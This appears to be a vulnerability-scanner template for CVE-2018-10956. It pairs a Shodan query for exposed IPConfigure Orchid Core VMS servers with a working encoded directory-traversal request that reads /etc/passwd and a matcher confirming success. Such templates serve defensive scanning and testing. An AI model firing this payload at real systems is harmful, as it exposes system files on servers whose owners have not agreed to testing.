id: CVE-2018-10956 info: name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. author: 0x_Akoko severity: high description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb - https://www.cvedetails.com/cve/CVE-2018-10956 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 metadata: shodan-query: http.title:"Orchid Core VMS" tags: cve,cve2018,orchid,vms,lfi requests: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200